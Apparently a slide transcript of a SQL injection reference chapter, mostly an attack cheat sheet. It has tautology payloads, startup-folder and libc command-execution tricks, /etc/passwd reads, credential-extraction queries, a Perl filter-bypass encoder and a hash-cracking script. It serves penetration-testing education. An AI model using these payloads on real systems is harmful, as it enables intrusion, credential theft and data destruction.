CHAPTER 10: References. Prepared by: Mohammed Zeinelabdeen, Mohammed Siddig Ahmed, Omer Salih Dawood.
Overview
  Structured Query Language (SQL)
  SQL Injection Quick Reference
  Bypassing Input Validation Filters
  Troubleshooting SQL Injection Attacks
  SQL Injection on Other Platforms
2/04/2011 CHAPTER 10 2
Structured Query Language (SQL)
SQL was originally developed at IBM in the early 1970s and was formalized in 1986 by the American National Standards Institute (ANSI). The statements below follow the SQL standard as defined by the International Organization for Standardization (ISO); where a statement is specific to one product, that product is named.
SQL Queries
SQL queries are made up of one or more SQL statements, which are effectively instructions for the database server to carry out. A statement may include a conditional clause (WHERE) to target specific rows in a table; the OR and AND operators are used when multiple conditions are to be evaluated.
SELECT Statement
  SELECT * FROM tblUsers;
  SELECT * INTO hackerTable FROM tblUsers;   -- SQL Server: copies the table into a new table
UNION Operator
  SELECT username, password FROM tblUsers UNION SELECT username, password FROM tblAdmins;
  SELECT username, password FROM tblUsers UNION ALL SELECT username, password FROM tblAdmins;
UNION removes duplicate rows from the combined result; UNION ALL keeps them. Both require the two SELECTs to return the same number of columns with compatible types, which is why column-count and type discovery comes first when UNION is used to extract data through an injection point.
SQL Queries (cont.)
INSERT Statement
  INSERT INTO tblUsers VALUES (5,'john','smith',0);
  INSERT INTO tblUsers(id, username, password, priv) VALUES (5,'john','smith',0);
UPDATE Statement
  UPDATE tblUsers SET priv=0 WHERE username='sarah';
DELETE Statement
  DELETE FROM tblUsers WHERE username='admin';
SQL Queries (cont.)
Notes from the Underground... how a tautology changes what a statement does
  SELECT story FROM news WHERE id=19;           -- one story
  SELECT story FROM news WHERE id=19 OR 1=1;    -- 1=1 is always true: every story is returned
  SELECT story FROM news WHERE id=19 OR 1=2;    -- 1=2 is always false: same result as the original
  UPDATE tblUsers SET password='letmein' WHERE emailaddress='someuser@victim.com';
  UPDATE tblUsers SET password='letmein' WHERE emailaddress='' OR 1=1--';
The last statement is what the application builds when the attacker submits ' OR 1=1-- as the e-mail address: the WHERE clause is now true for every row, so every user's password becomes letmein. The same tautology that merely leaks extra rows from a SELECT rewrites the whole table when it lands in an UPDATE or DELETE.
SQL Queries (cont.)
DROP Statement
  DROP TABLE tblUsers;
CREATE TABLE Statement
  CREATE TABLE shoppinglist(item int, name varchar(100));
  CREATE TABLE shoppinglist AS SELECT * FROM dba_users;   -- Oracle: create a table from a query result
ORDER BY Clause
  SELECT cost, product FROM orders ORDER BY cost DESC;
SQL Queries (cont.)
ALTER TABLE Statement
  ALTER TABLE tblUsers ADD comments varchar(100);
  ALTER TABLE tblUsers DROP COLUMN comments;
  ALTER TABLE tblUsers ALTER COLUMN comments varchar(500);   -- SQL Server syntax; Oracle and MySQL use MODIFY
GROUP BY Clause
  SELECT customer, SUM(cost) FROM orders WHERE customer='Anthony Anteater' GROUP BY customer;
SQL Queries (cont.)
Limiting the Result Set

SQL Injection Quick Reference
SQL Injection Quick Reference
The most common SQL queries and techniques needed when exploiting an SQL injection vulnerability: first how to identify the database platform, then an SQL injection cheat sheet for each platform.
Identifying the Database Platform
A first hint comes from the web server platform and scripting language: IIS + ASP.NET usually means SQL Server, Apache + PHP usually means MySQL, and so on. That is only a guess, though; a more scientific approach is needed.

Time Delay Inference is a long-standing method of identifying the database platform. Each platform has its own way of pausing a query, or, where no sleep function is available to the application account, "heavy queries" designed to consume the processor for a measurable length of time can be submitted instead. A payload that stalls the response on one platform and is a syntax error on every other identifies the back end.

A second method relies on syntax that only one platform accepts. For example, if we suspect that the database platform is either Microsoft SQL Server or Oracle, string concatenation tells them apart, because Oracle uses || and SQL Server uses +:
  ' AND 'ahmed' || 'ali' = 'ahmedali'--    -- true on Oracle, a syntax error on SQL Server
  ' AND 'ahmed' + 'ali' = 'ahmedali'--     -- true on SQL Server, an error on Oracle
Whichever probe leaves the page behaving exactly as it did before the injection is the one the database understood.
Combining Multiple Rows
Many injection points return only one column and one row at a time. To bypass this restriction, concatenate all rows (and columns) into a single string so that the whole result set comes back in one value.
Examples:
  -- returns a comma separated list of users (the statement itself did not survive on this slide)
  SELECT sys.stragg(distinct username||';') FROM all_users;   -- Oracle: returns all usernames on a single line
Cheat Sheets
A quick reference of common SQL statements used in SQL injection attacks against Oracle and MySQL.

MySQL Cheat Sheet
MySQL is most often found behind PHP and Ruby on Rails applications.
Configuration Information and Schema
Attacking the Database Server: MySQL
System Command Execution
It is possible to execute operating system commands by writing a malicious script file to the target server with SELECT ... INTO DUMPFILE. The database user needs the FILE privilege, and the account the MySQL service runs as needs write access to the target directory.
  SELECT 'system_commands' INTO DUMPFILE 'trojanpath';
  SELECT 'net user x x' INTO DUMPFILE 'c:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\attack.bat';
A batch file in the All Users Startup folder runs the next time anyone logs on to the console. Backslashes must be doubled inside a MySQL string literal (or forward slashes used), otherwise the path is mangled before it reaches the filesystem.
Cracking Database Passwords (MySQL)
Extract the user password hashes from the mysql.user table:
  SELECT concat(user,':',password) FROM mysql.user;
The hashes can then be cracked using http://hashcrack.com/ or John the Ripper (www.openwall.com/john/).
Attacking the Database Directly (MySQL)
Code can be executed by connecting directly to the MySQL server and creating a user-defined function (UDF) backed by a shared library placed on the server. Tools to perform this attack:
  Windows: ww.scoobygang.org/HiDDenWarez/mexec.pl
  Windows: www.0xdeadbeef.info/exploits/raptor_winudf.tgz
This route needs network access to the database port and an account with the FILE privilege plus write access to a directory the server will load libraries from (the plugin directory on newer releases), which is why it is listed separately from web-based injection.
File Read/Write (MySQL)
The MySQL LOAD_FILE function returns a string containing the contents of the specified file. The database user needs the FILE privilege (the File_priv column in mysql.user) to invoke it, and the file must be readable by the account the MySQL service runs as.
  SELECT LOAD_FILE('/etc/passwd');
Where the injection is blind, a tool called SqlDumper can read file contents via blind SQL injection.
Oracle Cheat Sheet
Attacking the Database Server: Oracle
There are two different types of injection in Oracle:
  traditional SQL injection, where only a single SQL statement can be injected (Oracle does not execute stacked statements from a plain SQL query);
  PL/SQL injection, where an entire PL/SQL block can be executed.
Cracking Database Passwords (Oracle)
More than 100 Oracle tables contain password information, and sometimes the passwords are available as clear text or in a reversible form. The Enterprise Manager repository (the SYSMAN schema) stores credentials that its own DECRYPT function recovers:
  select view_username, sysman.decrypt(view_password) from sysman.mgmt_view_user_credentials;
  select credential_set_column, sysman.decrypt(credential_value) from sysman.mgmt_credentials2;
Oracle password hashes can then be cracked using a variety of freely available tools, such as Woraauthbf, John the Ripper, Gsauditor, Checkpwd and Cain & Abel.
Bypassing Input Validation Filters

Bypassing Input Validation Filters
You can bypass input validation filters that rely on rejecting known bad characters and string literals by encoding your input, so that the filter never sees the literal it is looking for.
Quote Filters
The single-quote character (') is synonymous with SQL injection attacks, so it is the character filters most often strip or reject. The idea behind this approach is to prevent the attacker from breaking out of quote-delimited data. The counter is to express string literals without using a quote at all.

Quote Filters (cont.)
The statement to express without quotes:
  SELECT 'ABC'

Quote Filters (cont.)
Microsoft SQL Server also allows you to build your query within a variable and then call EXEC to execute it, so the whole statement, quotes included, can be supplied as a single hex-encoded binary literal:
  DECLARE @q varchar(8000)
  SELECT @q=0x53454c454354202741424327   -- the bytes of: SELECT 'ABC'
  EXEC(@q)
This works because a 0x... literal assigned to a varchar is taken byte for byte, so no quote character appears anywhere in the injected text. You can use the following Perl script to encode SQL statements this way automatically:
Quote Filters (cont.)
  #!/usr/bin/perl
  # Hex-encodes a SQL statement and wraps it in a DECLARE / SELECT @q=0x... / EXEC(@q)
  # block, so the statement can be submitted to SQL Server without a quote character.
  use strict;
  use warnings;

  print "Enter SQL query to encode: ";
  my $teststr = <STDIN>;
  chomp $teststr;

  my $hardcoded_sql = 'declare @q varchar(8000) '
                    . 'select @q=0x*** '
                    . 'exec(@q)';

  my $prepared = encode_sql($teststr);
  $hardcoded_sql =~ s/\*\*\*/$prepared/;   # drop the hex literal into the *** placeholder
  print "[*]-Encoded SQL:\n";
  print $hardcoded_sql . "\n";

  sub encode_sql {
      my ($sqlstr) = @_;
      my $encoded_command = '';
      # Two hex digits per byte (%02x): a bare %x would emit a single digit for
      # bytes below 0x10 such as tab or newline and corrupt the literal.
      foreach my $byte (unpack("C*", $sqlstr)) {
          $encoded_command .= sprintf('%02x', $byte);
      }
      return $encoded_command;
  }
HTTP Encoding
You can sometimes bypass input validation filters that reject known bad characters (often referred to as blacklisting) by URL-encoding those characters, for example sending %27 instead of a quote. If the filter inspects the request before the web server or framework has decoded it, the filter sees only %27 while the decoded quote still reaches the query. Where the application decodes the parameter a second time, double encoding (%2527, since %25 is an encoded %) gets past a filter that runs after the first decode. A filter that canonicalizes its input (decodes until nothing changes) before checking closes this gap, but the robust fix is parameterized queries rather than a better blacklist.
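The encoding bypass above, as an added example that is not part of the original slides. The blacklist, the decode pipeline and the payloads are constructed here to show the failure mode and do not model any particular web framework; the point is that the same filter catches or misses the same attack depending only on which representation it inspects.

```python
"""Blacklist filtering vs. URL encoding: where the filter runs decides what it sees.

Added example, not code from the original slides. The blacklist, the decode
pipeline and the payloads are constructed here to show the failure mode; they
do not model any particular web framework.
"""
from typing import Dict, Tuple
from urllib.parse import unquote

BAD_TOKENS = ("'", "--", ";", "/*", " or ", " union ")

PLAIN   = "' OR 'a'='a"                              # what the database must receive
ENCODED = "%27%20OR%20%27a%27%3D%27a"                # one layer of URL encoding
DOUBLE  = "%2527%2520OR%2520%2527a%2527%253D%2527a"  # %25 is an encoded '%'


def blacklisted(value: str) -> bool:
    """The filter under test: reject any input containing a known-bad token."""
    lowered = value.lower()
    return any(token in lowered for token in BAD_TOKENS)


def run_pipeline(raw: str, filter_after_decodes: int, total_decodes: int) -> Tuple[bool, str]:
    """Push `raw` through `total_decodes` URL-decode steps (web server,
    framework, application code ...) with the blacklist applied once, after
    `filter_after_decodes` of them. Returns (blocked, value reaching the SQL)."""
    value = raw
    for step in range(total_decodes + 1):
        if step == filter_after_decodes and blacklisted(value):
            return True, value
        if step < total_decodes:
            value = unquote(value)
    return False, value


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing, so the filter checks the same
    representation the query will eventually receive. The round cap guards
    against pathological input."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def demo() -> Dict[str, Tuple[bool, str]]:
    """Five placements of the same blacklist against the same attack."""
    canonical = canonicalize(DOUBLE)
    return {
        "plain, filter on raw input":                run_pipeline(PLAIN, 0, 1),    # caught
        "encoded, filter on raw input":              run_pipeline(ENCODED, 0, 1),  # bypassed
        "encoded, filter after one decode":          run_pipeline(ENCODED, 1, 1),  # caught
        "double-encoded, filter after one decode, app decodes again":
                                                     run_pipeline(DOUBLE, 1, 2),   # bypassed
        "double-encoded, filter canonicalizes first": (blacklisted(canonical), canonical),
    }


if __name__ == "__main__":
    for case, (blocked, reaches_sql) in demo().items():
        print(f"{'BLOCKED' if blocked else 'REACHED'}  {case}: {reaches_sql!r}")
```

The two bypass rows are the ones the slide describes: the filter ran on a representation that no longer matched what the query received. Canonicalizing first fixes that particular gap; it does not make a blacklist complete, which is why the lasting fix is a parameterized query.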
Troubleshooting SQL Injection Attacks

Troubleshooting SQL Injection Attacks
The table on this slide lists some of the common challenges and errors frequently encountered when attempting to exploit an SQL injection flaw across the various platforms.
SQL Injection on Other Platforms

SQL Injection on Other Platforms
This section is intended to provide a quick reference for other, less common platforms, such as PostgreSQL, DB2, Informix and Ingres.

PostgreSQL Cheat Sheet
Extracting the PostgreSQL Database Configuration Information:
Extracting the PostgreSQL Database Schema:
Blind SQL Injection Functions:

Attacking the Database Server: PostgreSQL
PostgreSQL does not offer a built-in procedure for executing operating system commands, but it is possible to import functions such as system() from an external .dll or shared object (.so) file.
System Command Execution
Import the system function from the standard UNIX libc library:
  CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT;
The system function can then be called by executing the following SQL query:
  SELECT system('command');
Creating a C-language function requires superuser rights, and the libc path differs between distributions and architectures (for example /lib/x86_64-linux-gnu/libc.so.6 on 64-bit Debian and Ubuntu). On PostgreSQL 8.2 and later the server refuses to load a library that lacks the PG_MODULE_MAGIC block, so libc cannot be imported directly and a purpose-built shared object containing that block has to be placed on the server instead.
Local File Access (PostgreSQL)
Local files can be read by the superuser account using the following SQL (COPY from a server-side file is a superuser-only operation):
  CREATE TABLE filedata(t text);
  COPY filedata FROM '/etc/passwd';
It is also possible to write local files:
  CREATE TABLE thefile(evildata text);
  INSERT INTO thefile(evildata) VALUES ('some evil data');
  COPY thefile (evildata) TO '/tmp/evilscript.sh';
Both operations run with the permissions of the account the PostgreSQL service runs as, not those of the database user.
Cracking Database Passwords (PostgreSQL)
PostgreSQL passwords are hashed using the MD5 algorithm; the stored value is the prefix md5 followed by MD5(password || username), so the user name acts as the salt. Reading pg_shadow also requires superuser rights:
  select usename||':'||passwd from pg_shadow;
On PostgreSQL 10 and later the server may use SCRAM-SHA-256 instead, in which case the passwd column starts with SCRAM-SHA-256$ and the MD5 attack does not apply.
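The offline step that follows the two hash-extraction queries on these slides (concat(user,':',password) from mysql.user in the MySQL section, and usename||':'||passwd from pg_shadow here), as an added example that is not code from the original slides. The two hash constructions are the documented ones for MySQL 4.1+ and for PostgreSQL's md5 scheme; the dump lines and the word list are constructed so the script runs offline, and the SCRAM line is a placeholder showing how an unsupported scheme is skipped rather than misreported.

```python
"""Offline cracking of the hashes returned by the mysql.user and pg_shadow queries.

Added example, not code from the original slides. The two constructions are the
documented ones: MySQL 4.1+ stores '*' + SHA1(SHA1(password)) in upper-case hex,
and PostgreSQL's md5 scheme stores 'md5' + MD5(password || username), so the
user name is the salt. The dump lines and the word list are constructed here.
"""
import hashlib
from typing import Dict, Iterable, Optional


def mysql41_hash(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by SHA1(SHA1(pw)) as 40 upper-case hex digits."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def postgres_md5_hash(password: str, username: str) -> str:
    """PostgreSQL md5 scheme: 'md5' followed by MD5(pw || username) in hex."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()


def hash_scheme(stored: str) -> Optional[str]:
    """Recognise the stored format so the matching construction is tried."""
    if len(stored) == 41 and stored.startswith("*"):
        return "mysql41"
    if len(stored) == 35 and stored.startswith("md5"):
        return "postgres-md5"
    return None  # e.g. 16-hex-digit pre-4.1 MySQL hashes, or SCRAM-SHA-256 on PostgreSQL 10+


def crack_dump(lines: Iterable[str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """For each 'user:hash' line, return the word-list entry that reproduces the
    hash, or None when no word matches or the scheme is not supported."""
    words = list(wordlist)
    found: Dict[str, Optional[str]] = {}
    for line in lines:
        user, _, stored = line.strip().partition(":")
        scheme = hash_scheme(stored)
        found[user] = None
        for candidate in words:
            if scheme == "mysql41" and mysql41_hash(candidate) == stored.upper():
                found[user] = candidate
                break
            # The PostgreSQL salt is the user name, so one password gives a
            # different hash for every account and has to be tried per user.
            if scheme == "postgres-md5" and postgres_md5_hash(candidate, user) == stored:
                found[user] = candidate
                break
    return found


# Constructed sample data in the shape the two extraction queries return.
MYSQL_DUMP = [
    f"root:{mysql41_hash('letmein')}",
    f"app:{mysql41_hash('S3cret!Value')}",                 # not in the word list
]
PG_DUMP = [
    f"postgres:{postgres_md5_hash('letmein', 'postgres')}",
    f"report:{postgres_md5_hash('letmein', 'report')}",    # same password, different hash
    "svc:SCRAM-SHA-256$4096:c2FsdA==$stored-key$server-key",  # constructed placeholder, skipped
]
WORDLIST = ["password", "123456", "letmein", "qwerty"]

if __name__ == "__main__":
    for name, dump in (("mysql.user", MYSQL_DUMP), ("pg_shadow", PG_DUMP)):
        for user, password in crack_dump(dump, WORDLIST).items():
            print(f"{name:<10} {user:<9} -> {password or 'not cracked'}")
```

For anything beyond a small word list, hand the same user:hash lines to John the Ripper (formats mysql-sha1 and postgres) or hashcat (modes 300 and 12); the script's value is in showing exactly what those tools compute, and why PostgreSQL hashes cannot be attacked with a precomputed table the way unsalted MySQL 4.1+ hashes can.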
DB2 Cheat Sheet
The DB2 database server from IBM is perhaps one of the least popular database platforms to find integrated with a Web application.
Extracting the DB2 Database Configuration Information:
Extracting the DB2 Database Schema:
Blind SQL Injection Functions:
Informix Cheat Sheet
The Informix database server is distributed by IBM and is not commonly encountered when compared to other database platforms.
Extracting the Informix Database Configuration Information:
Extracting the Informix Database Schema:
Blind SQL Injection Functions:
Ingres Cheat Sheet
The Ingres database is an open source database available for all major operating systems. Ingres is one of the least popular databases to find integrated with a Web application.
Extracting the Ingres Database Configuration Information:
Extracting the Ingres Database Schema:
Blind SQL Injection Functions:
Microsoft Access
Microsoft Access databases do not scale well with enterprise applications, and are therefore usually encountered only when the application has minimal database requirements. Brett Moore of insomniasec.com has published an excellent paper on SQL injection with Microsoft Access, which you can find here: www.insomniasec.com/publications/Access-Through-Access.pdf
Resources
SQL Injection White Papers
■ "Advanced SQL Injection" by Victor Chapela: www.owasp.org/index.php/Image:Advanced_SQL_Injection.ppt
■ "Advanced SQL Injection in SQL Server Applications" by Chris Anley: www.ngssoftware.com/papers/advanced_sql_injection.pdf
■ "Buffer Truncation Abuse in .NET and Microsoft SQL Server" by Gary O'Leary-Steele: http://scanner.sec-1.com/resources/bta.pdf
■ "Access through Access" by Brett Moore: www.insomniasec.com/publications/Access-Through-Access.pdf
■ "Time-Based Blind SQL Injection with Heavy Queries" by Chema Alonso: http://technet.microsoft.com/en-us/library/cc512676.aspx
SQL Injection Cheat Sheets
■ PentestMonkey.com SQL injection cheat sheets for Oracle, Microsoft SQL Server, MySQL, PostgreSQL, Ingres, DB2 and Informix: http://pentestmonkey.net/cheat-sheets/
■ Michaeldaw.org SQL injection cheat sheets for Sybase, MySQL, Oracle, PostgreSQL, DB2 and Ingres: http://michaeldaw.org/sql-injection-cheat-sheet/
■ Ferruh Mavituna cheat sheets for MySQL, SQL Server, PostgreSQL and Oracle: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
■ Ferruh Mavituna cheat sheet for Oracle: http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
SQL Injection Exploit Tools
■ BSQL Hacker is a relatively new player in the SQL injection exploit world. The tool is a Windows-based GUI application that supports Microsoft SQL Server, Oracle and MySQL, and supports both blind and error-based SQL injection techniques: http://labs.portcullis.co.uk/application/bsql-hacker/
■ The Sec-1 Automagic SQL Injection (SASI) tool is a Microsoft SQL Server exploit tool written in Perl: http://scanner.sec-1.com/resources/sasi.zip
Password Cracking Tools
■ Cain & Abel: www.oxid.it
■ Woraauthbf: www.soonerorlater.hu/index.khtml?article_id=513

More Related Content

What's hot

Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv OwaspAung Khant
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLPradeep Kumar
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
CIS 336 Inspiring Innovation/tutorialrank.com
CIS 336 Inspiring Innovation/tutorialrank.comCIS 336 Inspiring Innovation/tutorialrank.com
CIS 336 Inspiring Innovation/tutorialrank.comjonhson111
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
The sqlite3 commnad line tool
The sqlite3 commnad line toolThe sqlite3 commnad line tool
The sqlite3 commnad line toolpunu_82
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 

What's hot (20)

SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
 
Sql injection
Sql injectionSql injection
Sql injection
 
CIS 336 Inspiring Innovation/tutorialrank.com
CIS 336 Inspiring Innovation/tutorialrank.comCIS 336 Inspiring Innovation/tutorialrank.com
CIS 336 Inspiring Innovation/tutorialrank.com
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
The sqlite3 commnad line tool
The sqlite3 commnad line toolThe sqlite3 commnad line tool
The sqlite3 commnad line tool
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 

Viewers also liked (20)

References - sql injection
References - sql injection References - sql injection
References - sql injection
 
Testing
TestingTesting
Testing
 
Data cubes
Data cubesData cubes
Data cubes
 
Dbm630_lecture01
Dbm630_lecture01Dbm630_lecture01
Dbm630_lecture01
 
Dbm630 lecture10
Dbm630 lecture10Dbm630 lecture10
Dbm630 lecture10
 
Dbm630 lecture07
Dbm630 lecture07Dbm630 lecture07
Dbm630 lecture07
 
Dbm630 lecture04
Dbm630 lecture04Dbm630 lecture04
Dbm630 lecture04
 
Introduction to Data Warehousing
Introduction to Data WarehousingIntroduction to Data Warehousing
Introduction to Data Warehousing
 
Dbm630 lecture08
Dbm630 lecture08Dbm630 lecture08
Dbm630 lecture08
 
Datawarehouse and OLAP
Datawarehouse and OLAPDatawarehouse and OLAP
Datawarehouse and OLAP
 
Dbm630_lecture02-03
Dbm630_lecture02-03Dbm630_lecture02-03
Dbm630_lecture02-03
 
Dbm630 lecture05
Dbm630 lecture05Dbm630 lecture05
Dbm630 lecture05
 
Dbm630 lecture09
Dbm630 lecture09Dbm630 lecture09
Dbm630 lecture09
 
Data Mining and Data Warehousing
Data Mining and Data WarehousingData Mining and Data Warehousing
Data Mining and Data Warehousing
 
Apache kylin 2.0: from classic olap to real-time data warehouse
Apache kylin 2.0: from classic olap to real-time data warehouseApache kylin 2.0: from classic olap to real-time data warehouse
Apache kylin 2.0: from classic olap to real-time data warehouse
 
Design cube in Apache Kylin
Design cube in Apache KylinDesign cube in Apache Kylin
Design cube in Apache Kylin
 
Datacube
DatacubeDatacube
Datacube
 
Apache Kylin’s Performance Boost from Apache HBase
Apache Kylin’s Performance Boost from Apache HBaseApache Kylin’s Performance Boost from Apache HBase
Apache Kylin’s Performance Boost from Apache HBase
 
Oracle-Mengendalikan User
Oracle-Mengendalikan UserOracle-Mengendalikan User
Oracle-Mengendalikan User
 
MPLS
MPLSMPLS
MPLS
 

Similar to References

Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
Introduction to Threading in .Net
Introduction to Threading in .NetIntroduction to Threading in .Net
Introduction to Threading in .Netwebhostingguy
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c  - New Features for Developers and DBAsOracle Database 12c  - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assertfangjiafu
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access  from Programming LanguagesAdvanced SQL - Database Access  from Programming Languages
Advanced SQL - Database Access from Programming LanguagesS.Shayan Daneshvar
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 

Similar to References (20)

Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Introduction to Threading in .Net
Introduction to Threading in .NetIntroduction to Threading in .Net
Introduction to Threading in .Net
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c  - New Features for Developers and DBAsOracle Database 12c  - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
SQL Injection - Newsletter
SQL Injection - NewsletterSQL Injection - Newsletter
SQL Injection - Newsletter
 
Bypass dbms assert
Bypass dbms assertBypass dbms assert
Bypass dbms assert
 
Oracle notes
Oracle notesOracle notes
Oracle notes
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
Sql injection
Sql injectionSql injection
Sql injection
 
Advanced SQL - Database Access from Programming Languages
Advanced SQL - Database Access  from Programming LanguagesAdvanced SQL - Database Access  from Programming Languages
Advanced SQL - Database Access from Programming Languages
 
Sql injection
Sql injectionSql injection
Sql injection
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Full MSSQL Injection PWNage
Full MSSQL Injection PWNageFull MSSQL Injection PWNage
Full MSSQL Injection PWNage
 
Advanced sql injection 1
Advanced sql injection 1Advanced sql injection 1
Advanced sql injection 1
 
Pl sql chapter 1
Pl sql chapter 1Pl sql chapter 1
Pl sql chapter 1
 

References

  • 1. CHAPTER 10 References Prepared by :- Mohammed Zeinelabdeen. Mohammed Siddig Ahmed . Omer Salih Dawood.
  • 2. OVER VIEW Structured Query Language (SQL) . SQL Injection Quick Reference. Bypassing Input Validation Filters. Troubleshooting SQL Injection Attacks. SQL Injection on Other Platforms. 2/04/2011 CHAPTER 10 2
  • 3. Structured Query Language (SQL) 2/04/2011 3 CHAPTER 10
